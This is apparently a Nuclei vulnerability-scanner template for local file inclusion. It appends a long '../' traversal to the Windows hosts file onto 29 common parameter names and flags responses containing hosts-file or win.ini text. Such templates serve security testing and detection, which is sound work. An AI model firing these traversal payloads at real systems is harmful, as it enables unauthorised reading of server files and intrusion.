id: lfi-via-spider

info:
  name: Local File Inclusion
  author: reewardius
  severity: high
  tags: fuzzing-lfi,fuzzing-req

http:
  - method: GET
    path:
      - "{{BaseURL}}&file=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&fileName=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&filename=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&path=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&page=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&include=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&inc=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&template=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&tpl=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&view=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&document=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&file_location=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&folder=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&doc=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&download=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&content=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&filepath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&action=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&module=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&target=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&route=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&file_src=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&path_to_file=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&load=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&asset=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&open=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&read=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"
      - "{{BaseURL}}&pathfile=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "sample HOSTS file"
          - "[fonts]"
          - "[extensions]"
          - "[mci extensions]"
